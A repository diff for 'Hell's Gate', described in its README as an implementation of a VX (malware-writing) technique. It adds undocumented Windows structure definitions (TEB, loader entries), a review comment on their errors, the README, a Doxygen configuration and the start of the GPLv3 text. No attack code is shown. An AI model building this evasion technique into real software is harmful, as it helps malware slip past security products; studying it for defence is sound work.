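+struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
+PACTIVATION_CONTEXT ActivationContext;
+ULONG Flags;
+} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
+
+typedef struct _ACTIVATION_CONTEXT_STACK {
+PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
+LIST_ENTRY FrameListCache;
+ULONG Flags;
+ULONG NextCookieSequenceNumber;
+ULONG StackId;
+} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
+
+typedef struct _TEB {
+NT_TIB NtTib;
+PVOID EnvironmentPointer;
+CLIENT_ID ClientId;
+PVOID ActiveRpcHandle;
+PVOID ThreadLocalStoragePointer;
+PPEB ProcessEnvironmentBlock;
+ULONG LastErrorValue;
+ULONG CountOfOwnedCriticalSections;
+PVOID CsrClientThread;
+PVOID Win32ThreadInfo;
+ULONG User32Reserved[26];
+ULONG UserReserved[5];
+PVOID WOW32Reserved;
+LCID CurrentLocale;
+ULONG FpSoftwareStatusRegister;
+PVOID SystemReserved1[54];
+LONG ExceptionCode;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
+UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
+ULONG TxFsContext;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
+UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
+#else
+ACTIVATION_CONTEXT_STACK ActivationContextStack;
+UCHAR SpareBytes1[24];
+#endif
+GDI_TEB_BATCH GdiTebBatch;
+CLIENT_ID RealClientId;
+PVOID GdiCachedProcessHandle;
+ULONG GdiClientPID;
+ULONG GdiClientTID;
+PVOID GdiThreadLocalInfo;
+PSIZE_T Win32ClientInfo[62];
+PVOID glDispatchTable[233];
+PSIZE_T glReserved1[29];
+PVOID glReserved2;
+PVOID glSectionInfo;
+PVOID glSection;
+PVOID glTable;
+PVOID glCurrentRC;
+PVOID glContext;
+NTSTATUS LastStatusValue;
+UNICODE_STRING StaticUnicodeString;
+WCHAR StaticUnicodeBuffer[261];
+PVOID DeallocationStack;
+PVOID TlsSlots[64];
+LIST_ENTRY TlsLinks;
+PVOID Vdm;
+PVOID ReservedForNtRpc;
+PVOID DbgSsReserved[2];
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ULONG HardErrorMode;
+#else
+ULONG HardErrorsAreDisabled;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID Instrumentation[13 - sizeof(GUID) / sizeof(PVOID)];
+GUID ActivityId;
+PVOID SubProcessTag;
+PVOID EtwLocalData;
+PVOID EtwTraceData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+PVOID Instrumentation[14];
+PVOID SubProcessTag;
+PVOID EtwLocalData;
+#else
+PVOID Instrumentation[16];
+#endif
+PVOID WinSockData;
+ULONG GdiBatchCount;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+BOOLEAN SpareBool0;
+BOOLEAN SpareBool1;
+BOOLEAN SpareBool2;
+#else
+BOOLEAN InDbgPrint;
+BOOLEAN FreeStackOnTermination;
+BOOLEAN HasFiberData;
+#endif
+UCHAR IdealProcessor;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+ULONG GuaranteedStackBytes;
+#else
+ULONG Spare3;
+#endif
+PVOID ReservedForPerf;
+PVOID ReservedForOle;
+ULONG WaitingOnLoaderLock;
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID SavedPriorityState;
+ULONG_PTR SoftPatchPtr1;
+ULONG_PTR ThreadPoolData;
+#elif (NTDDI_VERSION >= NTDDI_WS03)
+ULONG_PTR SparePointer1;
+ULONG_PTR SoftPatchPtr1;
+ULONG_PTR SoftPatchPtr2;
+#else
+Wx86ThreadState Wx86Thread;
+#endif
+PVOID* TlsExpansionSlots;
+#if defined(_WIN64) && !defined(EXPLICIT_32BIT)
+PVOID DeallocationBStore;
+PVOID BStoreLimit;
+#endif
+ULONG ImpersonationLocale;
+ULONG IsImpersonating;
+PVOID NlsCache;
+PVOID pShimData;
+ULONG HeapVirtualAffinity;
+HANDLE CurrentTransactionHandle;
+PTEB_ACTIVE_FRAME ActiveFrame;
+#if (NTDDI_VERSION >= NTDDI_WS03)
+PVOID FlsData;
+#endif
+#if (NTDDI_VERSION >= NTDDI_LONGHORN)
+PVOID PreferredLangauges;
+PVOID UserPrefLanguages;
+PVOID MergedPrefLanguages;
+ULONG MuiImpersonation;
+union
+{
+struct
+{
+USHORT SpareCrossTebFlags : 16;
+};
+USHORT CrossTebFlags;
+};
+union
+{
+struct
+{
+USHORT DbgSafeThunkCall : 1;
+USHORT DbgInDebugPrint : 1;
+USHORT DbgHasFiberData : 1;
+USHORT DbgSkipThreadAttach : 1;
+USHORT DbgWerInShipAssertCode : 1;
+USHORT DbgIssuedInitialBp : 1;
+USHORT DbgClonedThread : 1;
+USHORT SpareSameTebBits : 9;
+};
+USHORT SameTebFlags;
+};
+PVOID TxnScopeEntercallback;
+PVOID TxnScopeExitCAllback;
+PVOID TxnScopeContext;
+ULONG LockCount;
+ULONG ProcessRundown;
+ULONG64 LastSwitchTime;
+ULONG64 TotalSwitchOutTime;
+LARGE_INTEGER WaitReasonBitMap;
+#else
+BOOLEAN SafeThunkCall;
+BOOLEAN BooleanSpare[3];
+#endif
+} TEB, * PTEB;
+
+typedef struct _LDR_DATA_TABLE_ENTRY {
+LIST_ENTRY InLoadOrderLinks;
+LIST_ENTRY InMemoryOrderLinks;
+LIST_ENTRY InInitializationOrderLinks;
+PVOID DllBase;
+PVOID EntryPoint;
+ULONG SizeOfImage;
+UNICODE_STRING FullDllName;
+UNICODE_STRING BaseDllName;
+ULONG Flags;
+WORD LoadCount;
+WORD TlsIndex;
+union {
+LIST_ENTRY HashLinks;
+struct {
+PVOID SectionPointer;
+ULONG CheckSum;
+};
+};
+union {
+ULONG TimeDateStamp;
+PVOID LoadedImports;
+};
+PACTIVATION_CONTEXT EntryPointActivationContext;
+PVOID PatchInformation;
+LIST_ENTRY ForwarderLinks;
+LIST_ENTRY ServiceTagLinks;
+LIST_ENTRY StaticLinks;
+} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
+
+typedef struct _OBJECT_ATTRIBUTES {
+ULONG Length;
+PVOID RootDirectory;
+PUNICODE_STRING ObjectName;
+ULONG Attributes;
+PVOID SecurityDescriptor;
+PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _INITIAL_TEB {
+PVOID StackBase;
+PVOID StackLimit;
+PVOID StackCommit;
+PVOID StackCommitMax;
+PVOID StackReserved;
+} INITIAL_TEB, * PINITIAL_TEB;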
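Review bot: `_RTL_ACTIVATION_CONTEXT_STACK_FRAME` declares its `Previous` member as `struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME*` (two leading underscores) while the tag itself has one, so the member points at an unrelated incomplete type rather than the enclosing struct; it should read `struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;`. The only `PEB` field the program actually reads is `OSMajorVersion` (in `wmain`), and its offset is the sum of dozens of hand-typed fields above it, several of which (`HeapSegmentReserve` and its neighbours) are declared `ULONG` where the 64-bit structure uses pointer-sized fields, so the header should pin the one layout fact it relies on, e.g. `C_ASSERT(FIELD_OFFSET(PEB, OSMajorVersion) == 0x118);` under `#ifdef _WIN64`. The lowest `#else` branch of `TEB` uses `Wx86ThreadState`, a type declared nowhere in this header, so any build with `NTDDI_VERSION` below `NTDDI_WS03` cannot compile; since the program already refuses to run on anything but Windows 10, the pre-Vista variants could simply be dropped. A short header comment listing the fields the code depends on (`ProcessEnvironmentBlock`, `LoaderData`, `InMemoryOrderModuleList`, `InMemoryOrderLinks`, `DllBase`, `OSMajorVersion`) would tell the next reader which of these lines must stay accurate and which are decorative.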
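--- /dev/null
+++ b/PLACEHOLDER_PATH_NOT_ON_PAGE_README
@@ -0,0 +1,21 @@
+## Hell's Gate ##
+
+Original C Implementation of the Hell's Gate VX Technique
+<br />
+<br />
+Link to the paper: https://vxug.fakedoma.in/papers/hells-gate.pdf
+<br /> PDF also included in this repository.
+<br />
+<br />
+Authors:
+* Paul Laîné (@am0nsec)
+* smelly__vx (@RtlMateusz)
+<br />
+
+### Update ###
+Please note:
+* We are not claiming that this is ground-breaking as many people have been using this kind of technique for many years;
+* We are not claiming that this is the perfect and most optimised way to archive the objective. This is just one example on how to implementation the technique;
+* Judging the idea/technique/project/research solely on the name is petty to say the least and definitively childish; and
+* Any recommendation and/or ideas will always be welcome, just open an issue in this repository.
+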
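--- /dev/null
+++ b/Doxyfile
@@ -0,0 +1,385 @@
+# Doxyfile 1.8.18
+
+#---------------------------------------------------------------------------
+# Project related configuration options
+#---------------------------------------------------------------------------
+DOXYFILE_ENCODING = UTF-8
+PROJECT_NAME = "Shap Hell's Gate"
+PROJECT_NUMBER = 1.0
+PROJECT_BRIEF = "C# Implementation of the Hell's Gate VX Technique"
+PROJECT_LOGO =
+OUTPUT_DIRECTORY = ./doc/
+CREATE_SUBDIRS = YES
+ALLOW_UNICODE_NAMES = NO
+OUTPUT_LANGUAGE = English
+OUTPUT_TEXT_DIRECTION = None
+BRIEF_MEMBER_DESC = YES
+REPEAT_BRIEF = YES
+ABBREVIATE_BRIEF = "The $name class" \
+"The $name widget" \
+"The $name file" \
+is \
+provides \
+specifies \
+contains \
+represents \
+a \
+an \
+the
+ALWAYS_DETAILED_SEC = NO
+INLINE_INHERITED_MEMB = NO
+FULL_PATH_NAMES = YES
+STRIP_FROM_PATH =
+STRIP_FROM_INC_PATH =
+SHORT_NAMES = NO
+JAVADOC_AUTOBRIEF = NO
+JAVADOC_BANNER = NO
+QT_AUTOBRIEF = NO
+MULTILINE_CPP_IS_BRIEF = NO
+INHERIT_DOCS = YES
+SEPARATE_MEMBER_PAGES = NO
+TAB_SIZE = 4
+ALIASES =
+OPTIMIZE_OUTPUT_FOR_C = NO
+OPTIMIZE_OUTPUT_JAVA = NO
+OPTIMIZE_FOR_FORTRAN = NO
+OPTIMIZE_OUTPUT_VHDL = NO
+OPTIMIZE_OUTPUT_SLICE = NO
+EXTENSION_MAPPING =
+MARKDOWN_SUPPORT = YES
+TOC_INCLUDE_HEADINGS = 5
+AUTOLINK_SUPPORT = YES
+BUILTIN_STL_SUPPORT = NO
+CPP_CLI_SUPPORT = NO
+SIP_SUPPORT = NO
+IDL_PROPERTY_SUPPORT = YES
+DISTRIBUTE_GROUP_DOC = NO
+GROUP_NESTED_COMPOUNDS = NO
+SUBGROUPING = YES
+INLINE_GROUPED_CLASSES = NO
+INLINE_SIMPLE_STRUCTS = NO
+TYPEDEF_HIDES_STRUCT = NO
+LOOKUP_CACHE_SIZE = 0
+#---------------------------------------------------------------------------
+# Build related configuration options
+#---------------------------------------------------------------------------
+EXTRACT_ALL = YES
+EXTRACT_PRIVATE = YES
+EXTRACT_PRIV_VIRTUAL = YES
+EXTRACT_PACKAGE = YES
+EXTRACT_STATIC = YES
+EXTRACT_LOCAL_CLASSES = YES
+EXTRACT_LOCAL_METHODS = NO
+EXTRACT_ANON_NSPACES = YES
+HIDE_UNDOC_MEMBERS = NO
+HIDE_UNDOC_CLASSES = NO
+HIDE_FRIEND_COMPOUNDS = NO
+HIDE_IN_BODY_DOCS = NO
+INTERNAL_DOCS = NO
+CASE_SENSE_NAMES = YES
+HIDE_SCOPE_NAMES = NO
+HIDE_COMPOUND_REFERENCE= NO
+SHOW_INCLUDE_FILES = YES
+SHOW_GROUPED_MEMB_INC = NO
+FORCE_LOCAL_INCLUDES = NO
+INLINE_INFO = YES
+SORT_MEMBER_DOCS = YES
+SORT_BRIEF_DOCS = NO
+SORT_MEMBERS_CTORS_1ST = NO
+SORT_GROUP_NAMES = NO
+SORT_BY_SCOPE_NAME = NO
+STRICT_PROTO_MATCHING = NO
+GENERATE_TODOLIST = YES
+GENERATE_TESTLIST = YES
+GENERATE_BUGLIST = YES
+GENERATE_DEPRECATEDLIST= YES
+ENABLED_SECTIONS =
+MAX_INITIALIZER_LINES = 30
+SHOW_USED_FILES = YES
+SHOW_FILES = YES
+SHOW_NAMESPACES = YES
+FILE_VERSION_FILTER =
+LAYOUT_FILE =
+CITE_BIB_FILES =
+#---------------------------------------------------------------------------
+# Configuration options related to warning and progress messages
+#---------------------------------------------------------------------------
+QUIET = NO
+WARNINGS = YES
+WARN_IF_UNDOCUMENTED = YES
+WARN_IF_DOC_ERROR = YES
+WARN_NO_PARAMDOC = NO
+WARN_AS_ERROR = NO
+WARN_FORMAT = "$file:$line: $text"
+WARN_LOGFILE =
+#---------------------------------------------------------------------------
+# Configuration options related to the input files
+#---------------------------------------------------------------------------
+INPUT = .
+INPUT_ENCODING = UTF-8
+FILE_PATTERNS = *.c \
+*.cc \
+*.cxx \
+*.cpp \
+*.c++ \
+*.java \
+*.ii \
+*.ixx \
+*.ipp \
+*.i++ \
+*.inl \
+*.idl \
+*.ddl \
+*.odl \
+*.h \
+*.hh \
+*.hxx \
+*.hpp \
+*.h++ \
+*.cs \
+*.d \
+*.php \
+*.php4 \
+*.php5 \
+*.phtml \
+*.inc \
+*.m \
+*.markdown \
+*.md \
+*.mm \
+*.dox \
+*.doc \
+*.txt \
+*.py \
+*.pyw \
+*.f90 \
+*.f95 \
+*.f03 \
+*.f08 \
+*.f18 \
+*.f \
+*.for \
+*.vhd \
+*.vhdl \
+*.ucf \
+*.qsf \
+*.ice
+RECURSIVE = YES
+EXCLUDE =
+EXCLUDE_SYMLINKS = NO
+EXCLUDE_PATTERNS =
+EXCLUDE_SYMBOLS =
+EXAMPLE_PATH =
+EXAMPLE_PATTERNS = *
+EXAMPLE_RECURSIVE = NO
+IMAGE_PATH =
+INPUT_FILTER =
+FILTER_PATTERNS =
+FILTER_SOURCE_FILES = NO
+FILTER_SOURCE_PATTERNS =
+USE_MDFILE_AS_MAINPAGE =
+#---------------------------------------------------------------------------
+# Configuration options related to source browsing
+#---------------------------------------------------------------------------
+SOURCE_BROWSER = YES
+INLINE_SOURCES = YES
+STRIP_CODE_COMMENTS = YES
+REFERENCED_BY_RELATION = YES
+REFERENCES_RELATION = NO
+REFERENCES_LINK_SOURCE = YES
+SOURCE_TOOLTIPS = YES
+USE_HTAGS = NO
+VERBATIM_HEADERS = YES
+CLANG_ASSISTED_PARSING = NO
+CLANG_OPTIONS =
+CLANG_DATABASE_PATH =
+#---------------------------------------------------------------------------
+# Configuration options related to the alphabetical class index
+#---------------------------------------------------------------------------
+ALPHABETICAL_INDEX = YES
+COLS_IN_ALPHA_INDEX = 5
+IGNORE_PREFIX =
+#---------------------------------------------------------------------------
+# Configuration options related to the HTML output
+#---------------------------------------------------------------------------
+GENERATE_HTML = YES
+HTML_OUTPUT = html
+HTML_FILE_EXTENSION = .html
+HTML_HEADER =
+HTML_FOOTER =
+HTML_STYLESHEET =
+HTML_EXTRA_STYLESHEET =
+HTML_EXTRA_FILES =
+HTML_COLORSTYLE_HUE = 220
+HTML_COLORSTYLE_SAT = 100
+HTML_COLORSTYLE_GAMMA = 80
+HTML_TIMESTAMP = YES
+HTML_DYNAMIC_MENUS = YES
+HTML_DYNAMIC_SECTIONS = NO
+HTML_INDEX_NUM_ENTRIES = 100
+GENERATE_DOCSET = NO
+DOCSET_FEEDNAME = "Doxygen generated docs"
+DOCSET_BUNDLE_ID = org.doxygen.Project
+DOCSET_PUBLISHER_ID = org.doxygen.Publisher
+DOCSET_PUBLISHER_NAME = Publisher
+GENERATE_HTMLHELP = NO
+CHM_FILE =
+HHC_LOCATION =
+GENERATE_CHI = NO
+CHM_INDEX_ENCODING =
+BINARY_TOC = NO
+TOC_EXPAND = NO
+GENERATE_QHP = NO
+QCH_FILE =
+QHP_NAMESPACE = org.doxygen.Project
+QHP_VIRTUAL_FOLDER = doc
+QHP_CUST_FILTER_NAME =
+QHP_CUST_FILTER_ATTRS =
+QHP_SECT_FILTER_ATTRS =
+QHG_LOCATION =
+GENERATE_ECLIPSEHELP = NO
+ECLIPSE_DOC_ID = org.doxygen.Project
+DISABLE_INDEX = NO
+GENERATE_TREEVIEW = YES
+ENUM_VALUES_PER_LINE = 4
+TREEVIEW_WIDTH = 250
+EXT_LINKS_IN_WINDOW = NO
+HTML_FORMULA_FORMAT = png
+FORMULA_FONTSIZE = 10
+FORMULA_TRANSPARENT = YES
+FORMULA_MACROFILE =
+USE_MATHJAX = NO
+MATHJAX_FORMAT = HTML-CSS
+MATHJAX_RELPATH = https://cdn.jsdelivr.net/npm/mathjax@2
+MATHJAX_EXTENSIONS =
+MATHJAX_CODEFILE =
+SEARCHENGINE = YES
+SERVER_BASED_SEARCH = NO
+EXTERNAL_SEARCH = NO
+SEARCHENGINE_URL =
+SEARCHDATA_FILE = searchdata.xml
+EXTERNAL_SEARCH_ID =
+EXTRA_SEARCH_MAPPINGS =
+#---------------------------------------------------------------------------
+# Configuration options related to the LaTeX output
+#---------------------------------------------------------------------------
+GENERATE_LATEX = NO
+LATEX_OUTPUT = latex
+LATEX_CMD_NAME =
+MAKEINDEX_CMD_NAME = makeindex
+LATEX_MAKEINDEX_CMD = makeindex
+COMPACT_LATEX = NO
+PAPER_TYPE = a4
+EXTRA_PACKAGES =
+LATEX_HEADER =
+LATEX_FOOTER =
+LATEX_EXTRA_STYLESHEET =
+LATEX_EXTRA_FILES =
+PDF_HYPERLINKS = YES
+USE_PDFLATEX = YES
+LATEX_BATCHMODE = NO
+LATEX_HIDE_INDICES = NO
+LATEX_SOURCE_CODE = NO
+LATEX_BIB_STYLE = plain
+LATEX_TIMESTAMP = NO
+LATEX_EMOJI_DIRECTORY =
+#---------------------------------------------------------------------------
+# Configuration options related to the RTF output
+#---------------------------------------------------------------------------
+GENERATE_RTF = NO
+RTF_OUTPUT = rtf
+COMPACT_RTF = NO
+RTF_HYPERLINKS = NO
+RTF_STYLESHEET_FILE =
+RTF_EXTENSIONS_FILE =
+RTF_SOURCE_CODE = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the man page output
+#---------------------------------------------------------------------------
+GENERATE_MAN = NO
+MAN_OUTPUT = man
+MAN_EXTENSION = .3
+MAN_SUBDIR =
+MAN_LINKS = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the XML output
+#---------------------------------------------------------------------------
+GENERATE_XML = NO
+XML_OUTPUT = xml
+XML_PROGRAMLISTING = YES
+XML_NS_MEMB_FILE_SCOPE = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the DOCBOOK output
+#---------------------------------------------------------------------------
+GENERATE_DOCBOOK = NO
+DOCBOOK_OUTPUT = docbook
+DOCBOOK_PROGRAMLISTING = NO
+#---------------------------------------------------------------------------
+# Configuration options for the AutoGen Definitions output
+#---------------------------------------------------------------------------
+GENERATE_AUTOGEN_DEF = NO
+#---------------------------------------------------------------------------
+# Configuration options related to the Perl module output
+#---------------------------------------------------------------------------
+GENERATE_PERLMOD = NO
+PERLMOD_LATEX = NO
+PERLMOD_PRETTY = YES
+PERLMOD_MAKEVAR_PREFIX =
+#---------------------------------------------------------------------------
+# Configuration options related to the preprocessor
+#---------------------------------------------------------------------------
+ENABLE_PREPROCESSING = YES
+MACRO_EXPANSION = NO
+EXPAND_ONLY_PREDEF = NO
+SEARCH_INCLUDES = YES
+INCLUDE_PATH =
+INCLUDE_FILE_PATTERNS =
+PREDEFINED =
+EXPAND_AS_DEFINED =
+SKIP_FUNCTION_MACROS = YES
+#---------------------------------------------------------------------------
+# Configuration options related to external references
+#---------------------------------------------------------------------------
+TAGFILES =
+GENERATE_TAGFILE =
+ALLEXTERNALS = NO
+EXTERNAL_GROUPS = YES
+EXTERNAL_PAGES = YES
+#---------------------------------------------------------------------------
+# Configuration options related to the dot tool
+#---------------------------------------------------------------------------
+CLASS_DIAGRAMS = YES
+DIA_PATH =
+HIDE_UNDOC_RELATIONS = YES
+HAVE_DOT = NO
+DOT_NUM_THREADS = 1
+DOT_FONTNAME = Helvetica
+DOT_FONTSIZE = 10
+DOT_FONTPATH =
+CLASS_GRAPH = YES
+COLLABORATION_GRAPH = YES
+GROUP_GRAPHS = YES
+UML_LOOK = NO
+UML_LIMIT_NUM_FIELDS = 10
+TEMPLATE_RELATIONS = NO
+INCLUDE_GRAPH = YES
+INCLUDED_BY_GRAPH = YES
+CALL_GRAPH = NO
+CALLER_GRAPH = NO
+GRAPHICAL_HIERARCHY = YES
+DIRECTORY_GRAPH = YES
+DOT_IMAGE_FORMAT = png
+INTERACTIVE_SVG = NO
+DOT_PATH =
+DOTFILE_DIRS =
+MSCFILE_DIRS =
+DIAFILE_DIRS =
+PLANTUML_JAR_PATH =
+PLANTUML_CFG_FILE =
+PLANTUML_INCLUDE_PATH =
+DOT_GRAPH_MAX_NODES = 50
+MAX_DOT_GRAPH_DEPTH = 0
+DOT_TRANSPARENT = NO
+DOT_MULTI_TARGETS = YES
+GENERATE_LEGEND = YES
+DOT_CLEANUP = YES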
@ -0,0 +1,674 @@
|
|||
GNU GENERAL PUBLIC LICENSE
|
||||
Version 3, 29 June 2007
|
||||
|
||||
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
|
||||
Everyone is permitted to copy and distribute verbatim copies
|
||||
of this license document, but changing it is not allowed.
|
||||
|
||||
Preamble
|
||||
|
||||
The GNU General Public License is a free, copyleft license for
|
||||
software and other kinds of works.
|
||||
|
||||
The licenses for most software and other practical works are designed
|
||||
to take away your freedom to share and change the works. By contrast,
|
||||
the GNU General Public License is intended to guarantee your freedom to
|
||||
share and change all versions of a program--to make sure it remains free
|
||||
software for all its users. We, the Free Software Foundation, use the
|
||||
GNU General Public License for most of our software; it applies also to
|
||||
any other work released this way by its authors. You can apply it to
|
||||
your programs, too.
|
||||
|
||||
When we speak of free software, we are referring to freedom, not
|
||||
price. Our General Public Licenses are designed to make sure that you
|
||||
have the freedom to distribute copies of free software (and charge for
|
||||
them if you wish), that you receive source code or can get it if you
|
||||
want it, that you can change the software or use pieces of it in new
|
||||
free programs, and that you know you can do these things.
|
||||
|
||||
To protect your rights, we need to prevent others from denying you
|
||||
these rights or asking you to surrender the rights. Therefore, you have
|
||||
certain responsibilities if you distribute copies of the software, or if
|
||||
you modify it: responsibilities to respect the freedom of others.
|
||||
|
||||
For example, if you distribute copies of such a program, whether
|
||||
gratis or for a fee, you must pass on to the recipients the same
|
||||
freedoms that you received. You must make sure that they, too, receive
|
||||
or can get the source code. And you must show them these terms so they
|
||||
know their rights.
|
||||
|
||||
Developers that use the GNU GPL protect your rights with two steps:
|
||||
(1) assert copyright on the software, and (2) offer you this License
|
||||
giving you legal permission to copy, distribute and/or modify it.
|
||||
|
||||
For the developers' and authors' protection, the GPL clearly explains
|
||||
that there is no warranty for this free software. For both users' and
|
||||
authors' sake, the GPL requires that modified versions be marked as
|
||||
changed, so that their problems will not be attributed erroneously to
|
||||
authors of previous versions.
|
||||
|
||||
Some devices are designed to deny users access to install or run
|
||||
modified versions of the software inside them, although the manufacturer
|
||||
can do so. This is fundamentally incompatible with the aim of
|
||||
protecting users' freedom to change the software. The systematic
|
||||
pattern of such abuse occurs in the area of products for individuals to
|
||||
use, which is precisely where it is most unacceptable. Therefore, we
|
||||
have designed this version of the GPL to prohibit the practice for those
|
||||
products. If such problems arise substantially in other domains, we
|
||||
stand ready to extend this provision to those domains in future versions
|
||||
of the GPL, as needed to protect the freedom of users.
|
||||
|
||||
Finally, every program is threatened constantly by software patents.
|
||||
States should not allow patents to restrict development and use of
|
||||
software on general-purpose computers, but in those that do, we wish to
|
||||
avoid the special danger that patents applied to a free program could
|
||||
make it effectively proprietary. To prevent this, the GPL assures that
|
||||
patents cannot be used to render the program non-free.
|
||||
|
||||
The precise terms and conditions for copying, distribution and
|
||||
modification follow.
|
||||
|
||||
TERMS AND CONDITIONS
|
||||
|
||||
0. Definitions.
|
||||
|
||||
"This License" refers to version 3 of the GNU General Public License.
|
||||
|
||||
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||
works, such as semiconductor masks.
|
||||
|
||||
"The Program" refers to any copyrightable work licensed under this
|
||||
License. Each licensee is addressed as "you". "Licensees" and
|
||||
"recipients" may be individuals or organizations.
|
||||
|
||||
To "modify" a work means to copy from or adapt all or part of the work
|
||||
in a fashion requiring copyright permission, other than the making of an
|
||||
exact copy. The resulting work is called a "modified version" of the
|
||||
earlier work or a work "based on" the earlier work.
|
||||
|
||||
A "covered work" means either the unmodified Program or a work based
|
||||
on the Program.
|
||||
|
||||
To "propagate" a work means to do anything with it that, without
|
||||
permission, would make you directly or secondarily liable for
|
||||
infringement under applicable copyright law, except executing it on a
|
||||
computer or modifying a private copy. Propagation includes copying,
|
||||
distribution (with or without modification), making available to the
|
||||
public, and in some countries other activities as well.
|
||||
|
||||
To "convey" a work means any kind of propagation that enables other
|
||||
parties to make or receive copies. Mere interaction with a user through
|
||||
a computer network, with no transfer of a copy, is not conveying.
|
||||
|
||||
An interactive user interface displays "Appropriate Legal Notices"
|
||||
to the extent that it includes a convenient and prominently visible
|
||||
feature that (1) displays an appropriate copyright notice, and (2)
|
||||
tells the user that there is no warranty for the work (except to the
|
||||
extent that warranties are provided), that licensees may convey the
|
||||
work under this License, and how to view a copy of this License. If
|
||||
the interface presents a list of user commands or options, such as a
|
||||
menu, a prominent item in the list meets this criterion.
|
||||
|
||||
1. Source Code.
|
||||
|
||||
The "source code" for a work means the preferred form of the work
|
||||
for making modifications to it. "Object code" means any non-source
|
||||
form of a work.
|
||||
|
||||
A "Standard Interface" means an interface that either is an official
|
||||
standard defined by a recognized standards body, or, in the case of
|
||||
interfaces specified for a particular programming language, one that
|
||||
is widely used among developers working in that language.
|
||||
|
||||
The "System Libraries" of an executable work include anything, other
|
||||
than the work as a whole, that (a) is included in the normal form of
|
||||
packaging a Major Component, but which is not part of that Major
|
||||
Component, and (b) serves only to enable use of the work with that
|
||||
Major Component, or to implement a Standard Interface for which an
|
||||
implementation is available to the public in source code form. A
|
||||
"Major Component", in this context, means a major essential component
|
||||
(kernel, window system, and so on) of the specific operating system
|
||||
(if any) on which the executable work runs, or a compiler used to
|
||||
produce the work, or an object code interpreter used to run it.
|
||||
|
||||
The "Corresponding Source" for a work in object code form means all
|
||||
the source code needed to generate, install, and (for an executable
|
||||
work) run the object code and to modify the work, including scripts to
|
||||
control those activities. However, it does not include the work's
|
||||
System Libraries, or general-purpose tools or generally available free
|
||||
programs which are used unmodified in performing those activities but
|
||||
which are not part of the work. For example, Corresponding Source
|
||||
includes interface definition files associated with source files for
|
||||
the work, and the source code for shared libraries and dynamically
|
||||
linked subprograms that the work is specifically designed to require,
|
||||
such as by intimate data communication or control flow between those
|
||||
subprograms and other parts of the work.
|
||||
|
||||
The Corresponding Source need not include anything that users
|
||||
can regenerate automatically from other parts of the Corresponding
|
||||
Source.
|
||||
|
||||
The Corresponding Source for a work in source code form is that
|
||||
same work.
|
||||
|
||||
2. Basic Permissions.
|
||||
|
||||
All rights granted under this License are granted for the term of
|
||||
copyright on the Program, and are irrevocable provided the stated
|
||||
conditions are met. This License explicitly affirms your unlimited
|
||||
permission to run the unmodified Program. The output from running a
|
||||
covered work is covered by this License only if the output, given its
|
||||
content, constitutes a covered work. This License acknowledges your
|
||||
rights of fair use or other equivalent, as provided by copyright law.
|
||||
|
||||
You may make, run and propagate covered works that you do not
|
||||
convey, without conditions so long as your license otherwise remains
|
||||
in force. You may convey covered works to others for the sole purpose
|
||||
of having them make modifications exclusively for you, or provide you
|
||||
with facilities for running those works, provided that you comply with
|
||||
the terms of this License in conveying all material for which you do
|
||||
not control copyright. Those thus making or running the covered works
|
||||
for you must do so exclusively on your behalf, under your direction
|
||||
and control, on terms that prohibit them from making any copies of
|
||||
your copyrighted material outside their relationship with you.
|
||||
|
||||
Conveying under any other circumstances is permitted solely under
|
||||
the conditions stated below. Sublicensing is not allowed; section 10
|
||||
makes it unnecessary.
|
||||
|
||||
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||
|
||||
No covered work shall be deemed part of an effective technological
|
||||
measure under any applicable law fulfilling obligations under article
|
||||
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||
similar laws prohibiting or restricting circumvention of such
|
||||
measures.
|
||||
|
||||
When you convey a covered work, you waive any legal power to forbid
|
||||
circumvention of technological measures to the extent such circumvention
|
||||
is effected by exercising rights under this License with respect to
|
||||
the covered work, and you disclaim any intention to limit operation or
|
||||
modification of the work as a means of enforcing, against the work's
|
||||
users, your or third parties' legal rights to forbid circumvention of
|
||||
technological measures.
|
||||
|
||||
4. Conveying Verbatim Copies.
|
||||
|
||||
You may convey verbatim copies of the Program's source code as you
|
||||
receive it, in any medium, provided that you conspicuously and
|
||||
appropriately publish on each copy an appropriate copyright notice;
|
||||
keep intact all notices stating that this License and any
|
||||
non-permissive terms added in accord with section 7 apply to the code;
|
||||
keep intact all notices of the absence of any warranty; and give all
|
||||
recipients a copy of this License along with the Program.
|
||||
|
||||
You may charge any price or no price for each copy that you convey,
|
||||
and you may offer support or warranty protection for a fee.
|
||||
|
||||
5. Conveying Modified Source Versions.
|
||||
|
||||
You may convey a work based on the Program, or the modifications to
|
||||
produce it from the Program, in the form of source code under the
|
||||
terms of section 4, provided that you also meet all of these conditions:
|
||||
|
||||
a) The work must carry prominent notices stating that you modified
|
||||
it, and giving a relevant date.
|
||||
|
||||
b) The work must carry prominent notices stating that it is
|
||||
released under this License and any conditions added under section
|
||||
7. This requirement modifies the requirement in section 4 to
|
||||
"keep intact all notices".
|
||||
|
||||
c) You must license the entire work, as a whole, under this
|
||||
